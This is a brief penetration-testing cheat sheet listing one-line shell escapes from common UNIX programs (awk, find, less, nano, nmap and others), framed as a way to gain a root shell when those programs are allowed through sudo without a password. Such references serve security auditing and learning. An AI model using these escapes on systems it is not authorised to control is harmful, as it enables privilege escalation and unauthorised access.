Shell Escapes
- author:: Nathan Acks
- date:: 2021-10-31
Many common UNIX applications allow you to escape to a shell. This is particularly useful if they can be run with NOPASSWD via sudo.
awk
-awk 'BEGIN {system("/bin/sh")}'
find
-find . -exec /bin/sh \; -quit
ftp
-!/bin/sh
iftop
-!/bin/sh
less
-!/bin/sh
man
-!/bin/sh
more
-!/bin/sh
(may require TERM to be unset)nano
- ^R^X followed byreset; sh 1>&0 2>&0
nmap
- create a file containingos.execute("/bin/sh")
and then runnmap --script=$FILE
vim
- see “Set a Shell in ViM”
GTFOBins is your one-stop resource for shell escape information.